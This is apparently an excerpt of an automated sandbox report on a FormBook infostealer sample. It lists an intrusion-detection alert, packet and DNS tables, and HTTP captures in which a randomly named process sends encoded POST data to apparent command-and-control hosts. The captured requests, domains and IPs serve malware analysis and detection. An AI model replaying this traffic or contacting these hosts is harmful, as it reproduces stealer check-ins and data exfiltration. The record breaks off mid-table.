| 2024-11-06T20:34:24.595400+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50018 | 216.40.34.41 | 80 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Nov 6, 2024 20:32:37.713185072 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.713202000 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.713943958 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.713963032 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.714011908 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.714020014 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.714076042 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.732280970 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.732304096 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.732328892 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.732381105 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.732388973 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.732434988 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.764834881 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.764853001 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.764931917 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.764946938 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.764990091 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.824765921 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.824786901 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.824922085 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.824943066 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.824995995 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.825407982 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.825428963 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.825480938 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.825488091 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.825530052 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.825859070 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.825891972 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.825917006 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.825926065 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.825938940 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.825943947 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.825958967 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.825993061 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.826101065 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.826113939 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:33:20.995724916 CET4984480192.168.2.43.33.130.190
                                                                                    Nov 6, 2024 20:33:21.000801086 CET80498443.33.130.190192.168.2.4
                                                                                    Nov 6, 2024 20:33:21.000880003 CET4984480192.168.2.43.33.130.190
                                                                                    Nov 6, 2024 20:33:21.009021997 CET4984480192.168.2.43.33.130.190
                                                                                    Nov 6, 2024 20:33:21.014007092 CET80498443.33.130.190192.168.2.4
                                                                                    Nov 6, 2024 20:33:21.628855944 CET80498443.33.130.190192.168.2.4
                                                                                    Nov 6, 2024 20:33:21.629539013 CET80498443.33.130.190192.168.2.4
                                                                                    Nov 6, 2024 20:33:21.629609108 CET4984480192.168.2.43.33.130.190
                                                                                    Nov 6, 2024 20:33:21.632663012 CET4984480192.168.2.43.33.130.190
                                                                                    Nov 6, 2024 20:33:21.637411118 CET80498443.33.130.190192.168.2.4
                                                                                    Nov 6, 2024 20:33:36.692679882 CET4992280192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:36.697668076 CET8049922180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:36.697777987 CET4992280192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:36.750410080 CET4992280192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:36.756886005 CET8049922180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:37.681665897 CET8049922180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:37.730040073 CET4992280192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:37.863554955 CET8049922180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:37.863620996 CET4992280192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:38.261598110 CET4992280192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:39.280637980 CET4993880192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:39.285653114 CET8049938180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:39.285746098 CET4993880192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:39.297396898 CET4993880192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:39.302228928 CET8049938180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:40.255099058 CET8049938180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:40.308120012 CET4993880192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:40.437686920 CET8049938180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:40.437818050 CET4993880192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:40.808238983 CET4993880192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:41.827052116 CET4995080192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:41.832148075 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.832220078 CET4995080192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:41.843694925 CET4995080192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:41.848596096 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.848608971 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.851058960 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.851069927 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.851079941 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.851089001 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.851099968 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.851109982 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:41.851119041 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:42.983357906 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:43.026832104 CET4995080192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:43.166408062 CET8049950180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:43.166536093 CET4995080192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:43.355068922 CET4995080192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:44.374149084 CET4996580192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:44.379117966 CET8049965180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:44.379236937 CET4996580192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:44.387156963 CET4996580192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:44.392072916 CET8049965180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:45.316689968 CET8049965180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:45.370543957 CET4996580192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:45.492999077 CET8049965180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:45.493155003 CET4996580192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:45.493999958 CET4996580192.168.2.4180.178.39.235
                                                                                    Nov 6, 2024 20:33:45.498943090 CET8049965180.178.39.235192.168.2.4
                                                                                    Nov 6, 2024 20:33:50.557116985 CET5000180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:50.562108040 CET8050001203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:50.562225103 CET5000180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:50.573832989 CET5000180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:50.578727961 CET8050001203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:51.254524946 CET8050001203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:51.292131901 CET8050001203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:51.292198896 CET5000180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:52.092201948 CET5000180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:53.108475924 CET5000980192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:53.113909960 CET8050009203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:53.114440918 CET5000980192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:53.125643015 CET5000980192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:53.130507946 CET8050009203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:53.795711994 CET8050009203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:53.834247112 CET8050009203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:53.834311962 CET5000980192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:54.638552904 CET5000980192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:55.654938936 CET5001080192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:55.659790039 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.659897089 CET5001080192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:55.671230078 CET5001080192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:55.676069975 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676227093 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676258087 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676353931 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676364899 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676402092 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676413059 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676445007 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:55.676455975 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:56.352837086 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:56.388441086 CET8050010203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:56.388552904 CET5001080192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:57.182897091 CET5001080192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:58.201992989 CET5001180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:58.207066059 CET8050011203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:58.207223892 CET5001180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:58.216128111 CET5001180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:58.221434116 CET8050011203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:58.884802103 CET8050011203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:58.924141884 CET8050011203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:33:58.924339056 CET5001180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:58.925220966 CET5001180192.168.2.4203.161.49.193
                                                                                    Nov 6, 2024 20:33:58.930044889 CET8050011203.161.49.193192.168.2.4
                                                                                    Nov 6, 2024 20:34:03.964910030 CET5001280192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:03.969842911 CET8050012217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:03.969935894 CET5001280192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:03.985291958 CET5001280192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:03.990225077 CET8050012217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:04.811105013 CET8050012217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:04.854645967 CET5001280192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:04.934156895 CET8050012217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:04.934214115 CET5001280192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:05.495290041 CET5001280192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:06.555583954 CET5001380192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:06.560842991 CET8050013217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:06.560970068 CET5001380192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:06.607798100 CET5001380192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:06.613285065 CET8050013217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:07.413414955 CET8050013217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:07.463929892 CET5001380192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:07.535990953 CET8050013217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:07.536067009 CET5001380192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:08.120301962 CET5001380192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:09.139179945 CET5001480192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:09.144093037 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.144205093 CET5001480192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:09.155528069 CET5001480192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:09.161511898 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161525965 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161535978 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161545992 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161564112 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161572933 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161581993 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161592007 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:09.161601067 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:10.008156061 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:10.057706118 CET5001480192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:10.136245012 CET8050014217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:10.136370897 CET5001480192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:10.667758942 CET5001480192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:11.686104059 CET5001580192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:11.691318035 CET8050015217.160.0.132192.168.2.4
                                                                                    Nov 6, 2024 20:34:11.691441059 CET5001580192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:11.708276987 CET5001580192.168.2.4217.160.0.132
                                                                                    Nov 6, 2024 20:34:11.713494062 CET8050015217.160.0.132192.168.2.4
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| Nov 6, 2024 20:32:35.504540920 CET | 51540 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 6, 2024 20:32:36.115096092 CET | 53 | 51540 | 1.1.1.1 | 192.168.2.4 |
| Nov 6, 2024 20:33:20.977049112 CET | 58443 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 6, 2024 20:33:20.990058899 CET | 53 | 58443 | 1.1.1.1 | 192.168.2.4 |
| Nov 6, 2024 20:33:36.671788931 CET | 61450 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 6, 2024 20:33:36.684624910 CET | 53 | 61450 | 1.1.1.1 | 192.168.2.4 |
| Nov 6, 2024 20:33:50.499422073 CET | 52370 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 6, 2024 20:33:50.554245949 CET | 53 | 52370 | 1.1.1.1 | 192.168.2.4 |
| Nov 6, 2024 20:34:03.936585903 CET | 59240 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 6, 2024 20:34:03.960000038 CET | 53 | 59240 | 1.1.1.1 | 192.168.2.4 |
| Nov 6, 2024 20:34:17.733086109 CET | 62071 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 6, 2024 20:34:18.485666990 CET | 53 | 62071 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| Nov 6, 2024 20:32:35.504540920 CET | 192.168.2.4 | 1.1.1.1 | 0x1beb | Standard query (0) | www.evolutioncosmetics.com | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:20.977049112 CET | 192.168.2.4 | 1.1.1.1 | 0x8e52 | Standard query (0) | www.regents.health | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:36.671788931 CET | 192.168.2.4 | 1.1.1.1 | 0x8b81 | Standard query (0) | www.73613.shop | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:50.499422073 CET | 192.168.2.4 | 1.1.1.1 | 0xb2bf | Standard query (0) | www.eco-tops.website | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:34:03.936585903 CET | 192.168.2.4 | 1.1.1.1 | 0xfb67 | Standard query (0) | www.astrext.info | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:34:17.733086109 CET | 192.168.2.4 | 1.1.1.1 | 0x4fd3 | Standard query (0) | www.newhopetoday.app | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| Nov 6, 2024 20:32:36.115096092 CET | 1.1.1.1 | 192.168.2.4 | 0x1beb | No error (0) | www.evolutioncosmetics.com | evolutioncosmetics.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 6, 2024 20:32:36.115096092 CET | 1.1.1.1 | 192.168.2.4 | 0x1beb | No error (0) | evolutioncosmetics.com | | 69.27.100.185 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:20.990058899 CET | 1.1.1.1 | 192.168.2.4 | 0x8e52 | No error (0) | www.regents.health | regents.health | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 6, 2024 20:33:20.990058899 CET | 1.1.1.1 | 192.168.2.4 | 0x8e52 | No error (0) | regents.health | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:20.990058899 CET | 1.1.1.1 | 192.168.2.4 | 0x8e52 | No error (0) | regents.health | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:36.684624910 CET | 1.1.1.1 | 192.168.2.4 | 0x8b81 | No error (0) | www.73613.shop | | 180.178.39.235 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:36.684624910 CET | 1.1.1.1 | 192.168.2.4 | 0x8b81 | No error (0) | www.73613.shop | | 180.178.39.237 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:36.684624910 CET | 1.1.1.1 | 192.168.2.4 | 0x8b81 | No error (0) | www.73613.shop | | 180.178.39.238 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:36.684624910 CET | 1.1.1.1 | 192.168.2.4 | 0x8b81 | No error (0) | www.73613.shop | | 180.178.39.236 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:33:50.554245949 CET | 1.1.1.1 | 192.168.2.4 | 0xb2bf | No error (0) | www.eco-tops.website | | 203.161.49.193 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:34:03.960000038 CET | 1.1.1.1 | 192.168.2.4 | 0xfb67 | No error (0) | www.astrext.info | | 217.160.0.132 | A (IP address) | IN (0x0001) | false |
| Nov 6, 2024 20:34:18.485666990 CET | 1.1.1.1 | 192.168.2.4 | 0x4fd3 | No error (0) | www.newhopetoday.app | | 216.40.34.41 | A (IP address) | IN (0x0001) | false |
                                                                                    • www.evolutioncosmetics.com
                                                                                    • www.regents.health
                                                                                    • www.73613.shop
                                                                                    • www.eco-tops.website
                                                                                    • www.astrext.info
                                                                                    • www.newhopetoday.app
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| 0 | 192.168.2.4 | 49844 | 3.33.130.190 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe |
| Timestamp | Bytes transferred | Direction | Data |
| Nov 6, 2024 20:33:21.009021997 CET | 526 | OUT | GET /q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k= HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.regents.health
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
| Nov 6, 2024 20:33:21.628855944 CET | 403 | IN | HTTP/1.1 200 OK
                                                                                    Server: openresty
                                                                                    Date: Wed, 06 Nov 2024 19:33:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 263
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k="}</script></head></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| 1 | 192.168.2.4 | 49922 | 180.178.39.235 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe |
| Timestamp | Bytes transferred | Direction | Data |
| Nov 6, 2024 20:33:36.750410080 CET | 775 | OUT | POST /tizt/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.73613.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.73613.shop
                                                                                    Referer: http://www.73613.shop/tizt/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Ascii: 9hCtofh=nkKelaCdXUds+qM8sQz0g7hvQy1uEeyEI9utn/gYfYAt5PVwBziSb0voKn61Zu3s6uYSkj/z4W0hobNb1TXaofFt17/4wckeghkJ6Q+Qe/nqVS3UH7SqMzOYAqr8tBqvFkMqNKuZo8td/PlioEcupffG3l2cRjbFKPUnfJDb1dN2RvPESOR6ofryEP9n9QQRWg==
| Nov 6, 2024 20:33:37.681665897 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:38 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| 2 | 192.168.2.4 | 49938 | 180.178.39.235 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe |
| Timestamp | Bytes transferred | Direction | Data |
| Nov 6, 2024 20:33:39.297396898 CET | 795 | OUT | POST /tizt/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.73613.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.73613.shop
                                                                                    Referer: http://www.73613.shop/tizt/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:40.255099058 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:41 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    3 | 192.168.2.4 | 49950 | 180.178.39.235 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Nov 6, 2024 20:33:41.843694925 CET | 10877 | OUT | POST /tizt/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.73613.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.73613.shop
                                                                                    Referer: http://www.73613.shop/tizt/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:42.983357906 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:43 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
